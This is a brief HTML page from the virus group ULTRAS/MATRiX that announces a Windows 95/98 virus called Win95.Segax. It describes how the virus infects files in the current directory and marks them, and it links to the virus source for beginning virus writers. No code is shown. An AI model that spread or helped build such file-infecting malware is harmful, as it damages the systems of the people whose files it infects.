<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<meta name="Author" content="ULTRAS">
<title>Win95.Segax by ULTRAS/MATRiX</title>
</head>

<body text="#000000">

<p><img SRC="segax.gif" width="320" height="26"> </p>

<p><font size="-2" face="Verdana">My first Ring3 virus</font>.. <font face="Verdana"
COLOR="#000000" size="1">The standard virus for win95/98 infects files in current dir...
Puts a label &quot;DEAD&quot; in the infected files and enters the name in last
section....This virus will be interesting beginning virmaker for Win32.... </font></p>

<p><a href="segax.zip"><font size="-1" color="#FF0000" face="Verdana">Source</font></a> </p>
</body>
</html>
